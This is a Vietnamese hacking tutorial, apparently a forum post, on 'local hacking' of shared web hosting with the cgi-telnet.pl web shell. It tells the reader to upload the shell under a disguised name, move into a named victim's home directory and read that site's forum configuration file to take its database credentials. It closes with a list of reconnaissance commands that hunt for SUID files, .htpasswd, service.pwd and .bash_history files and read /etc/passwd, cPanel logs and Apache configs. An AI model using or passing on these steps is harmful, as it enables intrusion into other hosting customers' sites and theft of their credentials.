Hack Local với shell cgi-telnet.pl
Điều kiện cần :
+Bạn cần phải up 1 file view.pl ( cgi-telnet.pl ) lên host mình để hack, chmod 775 nhé !
+ Các lệnh để hack :
ls -al : lệnh này để xem thông tin
cd : lệnh này dùng để chuyển thư mục
Cat : lệnh này dùng để xem info database
Thường, với bảo mật ko quá cao, bạn chỉ cần dùng 3 lệnh cơ bản này là đủ rôì nhé !!
+ Tiến hành :
Sau khi up lên host, bạn chạy con view.pl nhé , khi đó nó sẽ đưa lên 1 màn hình đen để hack , bạn nhập pass vào nhé …
+ sau khi nhập pass, bạn sẽ có đường dẫn là : [[email protected]ênweb/home/kc/public_html/cgi-bin] , đây là đường dẫn đầu tiên từ host của bạn , bạn dùng lệnh cd /home/ , khi đó đường dẫn sẽ là [[email protected]ênweb/home] , bạn dùng lệnh ls -al để xem tất cả các host đang ở cùng trên sever của bạn. vd như chúng ta sẽ hack host của hoangtudaumat , bạn tiếp tục dùng lệnh cd hoangtudaumat , khi đó sẽ có đường dẫn là : [admin@teneb/home/hoangtudaumat/] , khi này , các bạn cần phải dùng lệnh chuyển đến public nhé , vẫn dùng lệnh : cd public_html , khi này , bạn đã có đường dẫn là [admin@tenweb/home/hoangtudaumat/public_html] , để xem các thư mục của public, bạn dùng lệnh ls -al nhé , khi này, các bạn sẽ thấy các tập tin như :forums . index.html …..
*** Bổ sung : Một hosting có cấu tạo thường là thư mục public_html sẽ chứa những gì “được hiện ra” trên web của victim , do đó bạn muốn tìm đến forum hay guessbook thì nên tìm tại đây . Nên tìm hiểu cấu trúc của hosting trước khi hack local **
Ðể hack , bạn tiếp tục dùng lệnh cd forum , khi đó , đường dẫn của bạn sẽ là [admin@tenweb/home/hoangtudaumat/public_html/forum] , bạn tiếp tục dùng lệnh ls -al để xem , các bạn sẽ thấy các file :conf_global.php , downloads_config.php …… , để xem thông tin của database , bạn dùng lệnh cat conf_global.php nhé , khi này, bạn đã giử được database ở trong tay rồi đấy ,
User database là $INFO[‘sql_database’]
Pass database là $INFO[‘sql_pass’]
sau đó muốn tìm hiểu nó có những cmd nào thì cứ type : help
muốn tìm hiếu sâu hơn : info …. vidụ tôi muốn hiểu ls là cái gì : info ls
đây là vài cmd mà hay dùng :
find
find / -type f -perm -04000 -ls : tìm tất cả suid file
find / -type f -perm -02000 -ls : tìm tất cả sgid files
find / -type f -name : tìm config.inc.php
find / -type f -name \”config*\ : tìm file config
find / -perm -2 -ls”), tìm file,folders cho phép ghi
find / -type f -name service.pwd :find all service.pwd files
find / -type f -name .htpasswd :find all .htpasswd files
find / -type f -name .bash_history,: find all .bash_history files
———————————————————
netstat -an | grep -i listen :show opened ports
netstat -an :show opened ports
————————————————
cat /etc/passwd :list user <+++ du`ng !
cat / etc/userdomains :View cpanel user-domains logs
cat /var/cpanel/accounting.log: View cpanel logs
cat /usr/local/apache/conf/httpd.conf : Aache configuration
cat /etc/httpd.conf :Apache configuration
cat /etc/syslog.conf :Syslog configuration
cat /etc/motd :Message Of The Day